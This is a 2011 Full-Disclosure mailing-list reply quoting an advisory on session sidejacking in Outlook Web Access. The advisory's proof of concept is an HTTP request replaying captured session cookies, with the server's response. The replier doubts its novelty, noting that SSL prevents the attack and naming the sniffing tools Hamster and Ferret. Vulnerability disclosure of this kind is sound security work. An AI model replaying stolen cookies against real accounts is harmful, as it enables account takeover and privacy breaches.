Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability

[yersinia <yersinia.spiros () gmail com>]

On Tue, Oct 25, 2011 at 8:26 PM, information security <
informationhacker08 () gmail com> wrote:

> ==============================================================================
>
>                       Microsoft Outlook Web Access Session
> sidejacking/Session Replay Vulnerability
>
> ===============================================================================
>
>                                                      by
>
>                                             Asheesh Kumar Mani Tripathi
>
>
> # code by Asheesh kumar Mani Tripathi
>
> # email informationhacker08 () gmail com
>
>
> # Credit by Asheesh Anaconda
>
> #Date 25th Oct 2011
>
>
> #Product  Outlook Web Access 8.2.254.0
>
>
>
> #Vulnerability
> SideJacking is the process of sniffing web cookies, then replaying them to
> clone another user's web session. Using a cloned web session, the jacker can
> exploit the victim's previously-established site access
>
> #Impact
> This allows attackers that can read the network traffic to intercept all
> the data that is submitted to the server or web pages viewed by the client.
> Since this data includes the session cookie, it allows him to impersonate
> the victim, even if the password itself is not compromised.
>
>
>
> #Proof of concept
>
>
>
> ========================================================================================================================
>
>                                                           Request
>
> ========================================================================================================================
> GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
> Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
> application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
> */*
> Referer: https://xxxwebmail.xxx.xxx/owa/
> Accept-Language: en-in
> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
> SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
> 3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
> Accept-Encoding: gzip, deflate
> Host: xxxwebmail.xxx.xxx
> Connection: Keep-Alive
> Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
> cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
> UserContext=e8997d6036554ada88a62dc9f2cf65d3
>
>
>
> ========================================================================================================================
>
>                                                           Response
>
> ========================================================================================================================
>
> HTTP/1.1 200 OK
> Cache-Control: no-cache
> Pragma: no-cache
> Content-Length: 58676
> Content-Type: text/html; charset=utf-8
> Expires: -1
> Server: Microsoft-IIS/7.0
> X-AspNet-Version: 2.0.50727
> X-OWA-Version: 8.2.254.0
> X-UA-Compatible: IE=EmulateIE7
> X-Powered-By: ASP.NET
> Date: Tue, 25 Oct 2011 15:00:01 GMT
>
> #If you have any questions, comments, or concerns, feel free to contact me.
>
>
>
> Probably i can't understeand. Is there truly someone so crazy to don't use
ssl for the owa access ? SSL stop sidejacking, and tool - nice FWIW - as
hamster and ferret just for example.

Best Regards

> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/